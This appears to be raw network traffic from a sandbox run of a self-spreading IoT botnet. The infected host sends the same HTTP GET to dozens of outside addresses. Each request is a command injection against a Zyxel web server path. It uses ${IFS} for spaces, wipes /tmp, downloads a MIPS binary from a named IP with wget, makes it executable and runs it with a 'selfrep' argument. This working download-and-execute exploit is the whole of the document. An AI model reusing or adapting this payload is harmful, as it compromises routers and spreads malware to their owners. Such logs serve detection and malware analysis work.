                                            Feb 2, 2024 06:21:22.819983006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6988192.168.2.1557916183.131.240.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820013046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6989192.168.2.1536840217.196.52.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820059061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6990192.168.2.154155089.158.7.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820090055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6991192.168.2.154986849.177.105.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820115089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6992192.168.2.154552268.192.87.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820161104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6993192.168.2.154654292.107.126.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820188046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6994192.168.2.153487876.7.128.178443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820209980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6995192.168.2.1547026176.120.229.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820250034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6996192.168.2.1557228220.114.150.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820277929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6997192.168.2.153549884.211.78.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820322990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6998192.168.2.1551722164.108.204.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820354939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6999192.168.2.154012444.148.186.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820394039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7000192.168.2.154749887.240.100.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820430994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7001192.168.2.1540304184.253.176.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820470095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7002192.168.2.1547012138.238.17.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820492983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7003192.168.2.1535660158.0.132.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820543051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7004192.168.2.1544310149.161.93.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820571899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7005192.168.2.1534432145.88.163.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820611954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7006192.168.2.1538190161.22.235.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820655107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7007192.168.2.1560564113.114.68.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820700884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7008192.168.2.1532978142.215.144.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820729017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7009192.168.2.153792867.238.70.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820746899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7010192.168.2.1542224160.146.9.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820787907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7011192.168.2.1545228193.90.207.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820811033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7012192.168.2.15439981.113.188.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820854902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7013192.168.2.1550218203.70.76.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820889950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7014192.168.2.1555070100.53.138.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820908070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7015192.168.2.1553896140.23.112.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820938110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7016192.168.2.155058661.19.235.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.820983887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7017192.168.2.1532872144.10.207.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821026087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7018192.168.2.1543738176.70.149.132443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821079016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7019192.168.2.1542072108.253.130.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821110010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7020192.168.2.1548750193.103.26.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821151972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7021192.168.2.155297636.216.222.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821161032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7022192.168.2.1558062142.188.212.132443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821202040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7023192.168.2.154467417.200.159.163443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821233988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7024192.168.2.1557270126.145.75.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821263075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7025192.168.2.1538450205.59.155.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821320057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7026192.168.2.1542108113.137.194.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821350098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7027192.168.2.1538712125.95.132.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821367979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7028192.168.2.1547226171.89.32.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821410894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7029192.168.2.154829678.237.244.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821423054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7030192.168.2.1545964173.188.145.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821450949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7031192.168.2.1556768204.61.252.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821491003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7032192.168.2.1535558212.238.26.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821528912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7033192.168.2.154283485.47.2.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821549892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7034192.168.2.1554526117.199.74.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821577072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7035192.168.2.1546410131.232.0.96443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821610928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7036192.168.2.1540250207.38.70.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821650982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7037192.168.2.155331485.115.244.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821675062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7038192.168.2.1545840118.175.99.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821711063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7039192.168.2.1537564181.134.100.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821734905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7040192.168.2.1545116221.177.89.218443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821755886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7041192.168.2.1559200150.54.58.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821780920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7042192.168.2.1554282193.123.157.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821825981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7043192.168.2.1535554156.22.177.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821856976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7044192.168.2.15595608.146.201.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821901083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7045192.168.2.155976479.47.245.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821943045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7046192.168.2.1538048213.96.19.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.821963072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7047192.168.2.1538006104.97.92.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822001934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7048192.168.2.155869461.194.244.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822043896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7049192.168.2.1545480103.0.237.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822065115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7050192.168.2.1543206142.179.82.163443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822114944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7051192.168.2.155796492.142.49.178443
                                            TimestampBytes transferredDirectionData
